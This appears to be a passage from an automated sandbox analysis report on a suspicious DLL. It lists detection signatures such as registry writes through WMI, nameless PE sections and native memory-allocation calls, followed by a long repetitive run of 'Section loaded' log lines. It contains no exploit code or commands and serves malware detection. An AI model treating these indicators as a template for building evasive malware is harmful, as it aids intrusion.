                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      PE file has nameless sectionsShow sources
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: qT9Qk5aKTk.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004021540_2_00402154
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F940940_2_02F94094
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F997F20_2_02F997F2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9B11C0_2_02F9B11C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_026D21542_2_026D2154
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023E40942_2_023E4094
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023EB11C2_2_023EB11C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023E97F22_2_023E97F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031BB11C3_2_031BB11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031B97F23_2_031B97F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031B40943_2_031B4094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031B554A3_2_031B554A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031B27A73_2_031B27A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031B44A23_2_031B44A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04C3409433_2_04C34094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04C397F233_2_04C397F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04C3B11C33_2_04C3B11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04C344A233_2_04C344A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04C327A733_2_04C327A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04C3554A33_2_04C3554A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_050AB11C43_2_050AB11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_050A97F243_2_050A97F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_050A409443_2_050A4094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_050A554A43_2_050A554A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_050A27A743_2_050A27A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_050A44A243_2_050A44A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_04C3409444_2_04C34094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_04C397F244_2_04C397F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_04C3B11C44_2_04C3B11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_04C344A244_2_04C344A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_04C327A744_2_04C327A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_04C3554A44_2_04C3554A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401D9F NtMapViewOfSection,0_2_00401D9F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401EB5 GetProcAddress,NtCreateSection,memset,0_2_00401EB5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00402375 NtQueryVirtualMemory,0_2_00402375
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F983B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_02F983B7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9B341 NtQueryVirtualMemory,0_2_02F9B341
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360066 NtAllocateVirtualMemory,0_2_01360066
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0136009C NtAllocateVirtualMemory,0_2_0136009C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360285 NtProtectVirtualMemory,0_2_01360285
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_026D1EB5 GetProcAddress,NtCreateSection,memset,2_2_026D1EB5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_026D1D9F NtMapViewOfSection,2_2_026D1D9F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_026D2375 NtQueryVirtualMemory,2_2_026D2375
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023E83B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_023E83B7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023EB341 NtQueryVirtualMemory,2_2_023EB341
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E009C NtAllocateVirtualMemory,5_2_035E009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E0066 NtAllocateVirtualMemory,5_2_035E0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E0285 NtProtectVirtualMemory,5_2_035E0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02FF009C NtAllocateVirtualMemory,9_2_02FF009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02FF0066 NtAllocateVirtualMemory,9_2_02FF0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02FF0285 NtProtectVirtualMemory,9_2_02FF0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02AE0066 NtAllocateVirtualMemory,12_2_02AE0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02AE0285 NtProtectVirtualMemory,12_2_02AE0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02AE009C NtAllocateVirtualMemory,12_2_02AE009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_03290285 NtProtectVirtualMemory,19_2_03290285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_03290066 NtAllocateVirtualMemory,19_2_03290066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_0329009C NtAllocateVirtualMemory,19_2_0329009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_008A0066 NtAllocateVirtualMemory,24_2_008A0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_008A0285 NtProtectVirtualMemory,24_2_008A0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_008A009C NtAllocateVirtualMemory,24_2_008A009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_0092009C NtAllocateVirtualMemory,29_2_0092009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_00920066 NtAllocateVirtualMemory,29_2_00920066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_00920285 NtProtectVirtualMemory,29_2_00920285
                      Source: qT9Qk5aKTk.dllBinary or memory string: OriginalFilenameRPCTEST.DLL vs qT9Qk5aKTk.dll
                      Source: qT9Qk5aKTk.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: qT9Qk5aKTk.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
